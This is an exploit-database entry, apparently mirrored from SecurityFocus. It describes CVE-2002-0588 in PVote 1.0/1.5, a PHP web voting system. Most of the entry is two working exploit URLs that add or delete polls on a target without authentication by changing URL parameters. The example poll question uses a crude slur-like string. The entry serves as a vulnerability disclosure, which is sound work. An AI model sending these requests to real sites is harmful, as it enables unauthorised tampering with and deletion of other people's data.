[] NeoSense
E X P L O I T S
title author type platform port cve id

PVote 1.0/1.5 - Poll Content Manipulation

Author: Daniel Nyström
type: webapps
platform: php
port: 
date_added: 2002-04-18 
date_updated: 2012-09-19 
verified: 1 
codes: CVE-2002-0588;OSVDB-14423 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/4540/info

PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.

It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters.

ADD A POLL:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad

where question refers to the topic of the topic to be added by the attack.

DELETE A POLL:

http://target/pvote/del.php?pollorder=1

where pollorder is the poll 'id' number for the poll to be deleted.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.